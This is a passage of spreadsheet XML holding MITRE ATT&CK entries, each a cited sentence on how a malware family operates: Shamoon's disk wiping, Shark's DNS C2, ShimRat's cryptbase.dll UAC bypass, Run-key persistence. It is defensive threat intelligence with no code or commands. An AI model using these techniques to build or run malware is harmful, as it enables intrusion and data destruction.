    <t>relationship--042001af-58f0-43c9-8747-5a0d0f7906f5</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has collected the current date and time of the victim system.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--088c3553-db7f-4e97-9f32-75e483d59cba</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) communicates over HTTP to retrieve a string that is decoded into a C2 server URL.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>relationship--c7c5c4f3-eb1e-4c32-b78c-65f2c622f548</t>
  </si>
  <si>
    <t>S0140</t>
  </si>
  <si>
    <t>Shamoon</t>
  </si>
  <si>
    <t>malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to disable UAC remote restrictions by modifying the Registry.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>relationship--c5a7cf46-a3ab-4d33-a43f-012c0c5fdf63</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</si>
  <si>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</si>
  <si>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relationship--4b4ac061-dee5-44f3-b0f5-021889eae45e</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has an operational mode for encrypting data instead of overwriting it.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>relationship--d7f4f6eb-05b8-43af-8d8a-e06b1d950165</t>
  </si>
  <si>
    <t xml:space="preserve">[Shamoon](https://attack.mitre.org/software/S0140) decrypts ciphertext using an XOR cipher and a base64-encoded string.(Citation: Unit 42 Shamoon3 2018)	</t>
  </si>
  <si>
    <t>relationship--8fe32611-4206-4bef-9698-dbcefde08090</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has been seen overwriting features of disk structure such as the MBR.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>relationship--10bc4c79-d47f-4d49-bc06-c65ae376a4b6</t>
  </si>
  <si>
    <t>If [Shamoon](https://attack.mitre.org/software/S0140) cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.(Citation: FireEye Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>relationship--5e6e745f-d756-4b6e-90e1-3adcf848570b</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can download an executable to run on the victim.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>relationship--3ded5760-4f2e-41f5-a2c5-f2b39eaf5733</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) attempts to copy itself to remote machines on the network.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>relationship--8ab5ee87-6fdf-447a-b622-0a68ed34e330</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</si>
  <si>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</si>
  <si>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relationship--3c630128-27ba-4c71-b09a-c9ac39e7acac</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</si>
  <si>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</si>
  <si>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relationship--af9347a3-00a9-4ece-b075-8c55bd4f4b9b</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) contains base64-encoded strings.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>relationship--59df5f14-e570-417e-8184-e8e7c6c1ea75</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) queries several Registry keys to identify hard disk partitions to overwrite.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>relationship--2dfbcf5d-8563-440c-bd9c-0cfc15059bd5</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) scans the C-class subnet of the IPs on the victim's interfaces.(Citation: FireEye Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>relationship--e1f4c08f-b5b1-4d62-8f1c-75f4302b0bce</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</si>
  <si>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</si>
  <si>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relationship--38ea7367-26e7-4a6a-b735-e98e3a35450a</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</si>
  <si>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</si>
  <si>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relationship--8dd9d97d-0eb1-4e17-94ac-5589db51f878</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</si>
  <si>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</si>
  <si>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relationship--73a53379-746e-46db-b101-1fc45df5e458</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the victim's operating system version and keyboard layout and sends the information to the C2 server.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>relationship--272068a3-47e3-42d6-8772-71d39c1976c3</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the target's IP address and local network segment.(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>relationship--5206976b-ac4d-4286-a954-4b1ef5c20adc</t>
  </si>
  <si>
    <t xml:space="preserve">[Shamoon](https://attack.mitre.org/software/S0140) will reboot the infected system once the wiping functionality has been completed.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)	</t>
  </si>
  <si>
    <t>relationship--d2ff2c76-04ed-41c4-bd35-75f7cf823aee</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b</t>
  </si>
  <si>
    <t xml:space="preserve">[Shamoon](https://attack.mitre.org/software/S0140) can change the modified time for files to evade forensic detection.(Citation: McAfee Shamoon December 2018)	</t>
  </si>
  <si>
    <t>relationship--ebf68107-a2b8-4ff1-916f-e1861a20914a</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) can impersonate tokens using &lt;code&gt;LogonUser&lt;/code&gt;, &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;, and &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;.(Citation: McAfee Shamoon December 2018)</t>
  </si>
  <si>
    <t>relationship--755bc45a-9048-4f58-b405-2ea8329328a1</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) has used HTTP for C2.(Citation: Palo Alto Shamoon Nov 2016)</t>
  </si>
  <si>
    <t>relationship--ed94edc7-e687-409e-9143-20a15190bd83</t>
  </si>
  <si>
    <t>[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named “ntssrv” to execute the payload. Newer versions create the "MaintenaceSrv" and "hdv_725x" services.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)</t>
  </si>
  <si>
    <t>relationship--4e9c5234-65e9-4b4a-bc13-891e7aed84b2</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can use DNS in C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--e9113d90-4c55-465a-88c6-b58c40b46f96</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) has stored information in folders named `U1` and `U2` prior to exfiltration.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--f3b14839-81b5-436f-87b0-f5b8bd10c07c</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can upload files to its C2.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--71449072-84c5-461c-9bba-2caa81051499</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can extract and decrypt downloaded .zip files.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--b10f18a6-43a8-436f-8d9c-f180428f0a0d</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can send DNS C2 communications using a unique domain generation algorithm.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--fbe56c62-5123-4783-8e66-7457c8cf66a2</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--08482fa2-6db3-4c82-8ca0-9d666454f2c6</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can update its configuration to use a different C2 server.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--61952f05-92a3-41e0-93c4-d7486a927ece</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can delete files downloaded to the compromised host.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--adb80a62-87cb-4197-a3a7-a3e5a6417d50</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019)  can download additional files from its C2 via HTTP or DNS.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--03d6c33c-22d4-484f-8f16-8d49c307da80</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--9b2a6cfa-3b05-4809-b778-3752bb152c2d</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can use encrypted and encoded files for C2 configuration.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--10d22e64-01ff-4302-a615-ee23970d86ae</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--1d7661c8-82cf-481c-89e4-927eedaffc22</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can pause C2 communications for a specified time.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--1803860a-88df-4af5-8c82-ebbe237bc370</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can stop execution if the screen width of the targeted machine is not over 600 pixels.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--87e73122-361f-47a2-a401-0e863300e123</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) can collect the GUID of a targeted machine.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--21f5a441-fe32-430e-935c-0929f4101b6e</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) has the ability to use HTTP in C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--c1fc2403-6cea-40ca-a5ba-82296600988c</t>
  </si>
  <si>
    <t>[Shark](https://attack.mitre.org/software/S1019) has the ability to use `CMD` to execute commands.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--346d9aa5-2d93-4843-a219-e0cb79bf6362</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) has dropped a recent-files stealer plugin to `C:\Users\Public\WinSrcNT\It11.exe`.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--614da3bc-3be9-408c-8154-8a121d4b8895</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) can load a plugin to exfiltrate stolen files to SMB shares also used in C2.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--7b28dace-9c62-4226-9878-dee480f541d4</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) has the ability to transfer data between SMB shares.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--942ced7d-f5a7-4c8d-ba66-e28479f7447a</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</si>
  <si>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</si>
  <si>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relationship--f5d2b140-1267-405b-8085-e02c135504f9</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) can hide windows using `ProcessWindowStyle.Hidden`.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--52ba680e-2884-4874-a0ea-470c96c4af51</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) has been used to download a Python interpreter to `C:\Users\Public\WinTN\WinTN.exe` as well as other plugins from external sources.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--f02fafab-e905-48a4-953d-6238f740cc77</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) can leverage Native APIs through plugins including `GetLogicalDrives`.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--e6aad2f6-4fb8-4987-a316-e7d50269a254</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) has dropped a plugin to monitor external drives to `C:\Users\Public\It3.exe`.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--eeb5eeab-3fa1-4670-a7ab-f6a8f7193be9</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) can create scheduled tasks to execute reverse shells that read and write data to and from specified SMB shares.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--4cd2bbbd-211a-4771-9e9d-a60356c04257</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) can use a plugin to enumerate system drives.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--c1004711-9899-4757-8338-428fe33c3411</t>
  </si>
  <si>
    <t>[SharpDisco](https://attack.mitre.org/software/S1089) can use `cmd.exe` to execute plugins and to send command output to  specified SMB shares.(Citation: MoustachedBouncer ESET August 2023)</t>
  </si>
  <si>
    <t>relationship--e1172f5d-5645-4963-b89c-fd975c1f2798</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has decompressed data received from the C2 server.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--a6bf495a-9769-433b-8754-e57f5e9045b7</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has the ability to download and execute additional payloads via a DropBox API.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--72babf5f-f117-4a1c-a453-6e6c16c355c4</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can execute arbitrary commands with PowerShell.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--5eabbcb7-3672-4518-9e2e-2a5a8e3120fa</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has the ability to create persistence for the malware using the Registry autorun key and startup folder.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--3698b20c-408a-4873-9284-19b2106bfaab</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has a persistence component to write a scheduled task for the payload.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--31fe18d1-7799-466c-adb3-3be923ed4f3a</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has the ability to capture the victim's screen.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--45060bf9-f01b-48a2-8a03-082ad7e7945f</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) has checked the system settings to see if Arabic is the configured language.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--9e85e741-0dcd-4a15-a35a-a920f46824c2</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546)  has been used to target Arabic-speaking users and used code that checks if the compromised machine has the Arabic language installed.(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--dbe09d1f-9826-448d-83e0-5712f575fe76</t>
  </si>
  <si>
    <t xml:space="preserve">[SharpStage](https://attack.mitre.org/software/S0546) has used a legitimate web service for evading detection.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--3a200957-9a8b-407e-a23f-cea1ef8236e6</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can execute arbitrary commands with the command line.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--31346f8a-0123-4ff8-88ab-4aaccd81377d</t>
  </si>
  <si>
    <t>[SharpStage](https://attack.mitre.org/software/S0546) can use WMI for execution.(Citation: Cybereason Molerats Dec 2020)(Citation: BleepingComputer Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--dcd99f6a-c554-4b04-a962-dc3a5f89cdf9</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed shim databases in the &lt;code&gt;AppPatch&lt;/code&gt; folder.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--9ec20e7b-8996-4f16-b830-1f8a0e99b778</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--4439e86a-de1d-4ea6-a856-858b799bcdc5</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRat](https://attack.mitre.org/software/S0444) has the capability to upload collected files to a C2.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>relationship--d6d72bc4-c8d7-48b3-96c3-84a9810333d2</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--980a5f66-14d7-42c6-82f7-ef96cbab77bb</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can use pre-configured HTTP proxies.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--0d1314fe-7fd6-4816-abb8-4b9872478807</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRat](https://attack.mitre.org/software/S0444) has used a secondary C2 location if the first was unavailable.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>relationship--a2118212-1594-4fb1-8076-5a8649756c9c</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--7288054b-0679-497a-b4c5-090801b06941</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can list directories.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--ec095867-cb54-4fcf-b2c7-00e805bf7500</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--58238854-4649-4cea-a43d-aae442dc60a6</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can download additional files.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--0177d430-a0b9-4f2f-8c66-8dfa4391611a</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can impersonate Windows services and antivirus products to avoid detection on compromised systems.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--684b6701-559f-4ba9-a2b0-f79ed5683eb1</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has registered two registry keys for shim databases.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--f81b567d-9fd3-44f4-bd6b-9ba6f386609e</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRat](https://attack.mitre.org/software/S0444) has used Windows API functions to install the service and shim.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>relationship--bdd7c955-c41a-4b68-9eb6-1ecd66869457</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can enumerate connected drives for infected host machines.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--d2ef2109-c65f-452b-bb5b-dd06d1b16602</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--b057569e-0e0b-4e8e-9955-016a556b8248</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed a registry based start-up key &lt;code&gt;HKCU\Software\microsoft\windows\CurrentVersion\Run&lt;/code&gt; to maintain persistence should other methods fail.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--6435caf7-2493-4cfb-9ddc-2f672c220251</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRat](https://attack.mitre.org/software/S0444) can sleep when instructed to do so by the C2.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>relationship--7060e30c-cbb6-4b79-ad52-5e1619e030f0</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444)'s loader has been packed with the compressed [ShimRat](https://attack.mitre.org/software/S0444) core DLL and the legitimate DLL for it to hijack.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--ac88262c-e14d-4f52-a5df-bbddc6d5c1bc</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) communicated over HTTP and HTTPS with C2 servers.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--80a14bfe-6bf6-4f87-8ae1-5085505656f2</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) can be issued a command shell function from the C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--84d3fa4b-a4c6-404c-a363-0d9a96381952</t>
  </si>
  <si>
    <t>[ShimRat](https://attack.mitre.org/software/S0444) has installed a Windows service to maintain persistence on victim machines.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--caa8b50b-67ab-4de4-b61a-ab89ea8a2e9b</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all non-privileged and privileged accounts available on the machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--52741f41-28c6-4533-bd26-6dc21f6b0794</t>
  </si>
  <si>
    <t xml:space="preserve">[ShimRatReporter](https://attack.mitre.org/software/S0445) used LZ compression to compress initial reconnaissance reports before sending to the C2.(Citation: FOX-IT May 2016 Mofang)	</t>
  </si>
  <si>
    <t>relationship--70af600c-ca7a-4ea3-8c03-3a166e2d88a7</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--f47a9039-b5c0-49e5-9998-2820b075643f</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) sent collected system and network information compiled into a report to an adversary-controlled C2.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--d894e46e-1967-4499-83d5-626a8e49a97a</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) sent generated reports to the C2 via HTTP POST requests.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--06317104-8397-453e-bef8-aa3269360ffc</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) had the ability to download additional payloads.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--137f13ee-0607-47ba-952b-dbe39c1330bb</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) spoofed itself as &lt;code&gt;AlphaZawgyl_font.exe&lt;/code&gt;, a specialized Unicode font.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--772a4f4f-459d-411f-a8e9-2c453274f684</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used several Windows API functions to gather information from the infected system.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--f5ced467-529f-4ce2-9f30-6a4a80565e87</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) encrypted gathered information with a combination of shifting and XOR using a static key.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--ed1cb231-7e2d-461c-a9c8-56a2d1f43c0f</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local privileges for the infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--c403720d-da66-45c4-bb35-93b3b35c87c3</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all running processes on the machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--f6ac9b3a-9a1f-40be-b541-bcdb8aac6845</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered a list of installed software on the infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--222ce94a-bb33-476b-b4c3-56b529d9af03</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the operating system name and specific Windows version of an infected machine.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--c62b3e99-4ab2-4474-b3f7-2779652210f7</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--c3e022e8-5759-4d38-8536-adaf9e952717</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) used the Windows function &lt;code&gt;GetExtendedUdpTable&lt;/code&gt; to detect connected UDP endpoints.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--16bea458-8018-4e53-a377-5970747521ab</t>
  </si>
  <si>
    <t>[ShimRatReporter](https://attack.mitre.org/software/S0445) communicated over HTTP with preconfigured C2 servers.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>relationship--e29d49a0-7cbf-47a2-b01a-d27056627c81</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has obfuscated scripts used in execution.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--45bff763-b4f8-45e5-bb40-c98b415131f9</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) can decrypt data received from a C2 and save to a file.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--aafa7447-cb73-4309-ac75-5326ab0d1079</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) will delete itself if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--9fce9cf9-2795-4384-abb5-cb049b3d4329</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) has installed a second-stage script in the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sibot&lt;/code&gt; registry key.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--df891390-43d8-4201-aebc-51c20cae5897</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) will delete an associated registry key if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--d8b95918-bf5b-455a-928c-1b69fe9c9703</t>
  </si>
  <si>
    <t>[Sibot](https://attack.mitre.org/software/S0589) can download and execute a payload onto a compromised system.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>relationship--8fe424be-6873-4b25-a87e-88b2de005d7f</t>
  </si>
  <si>
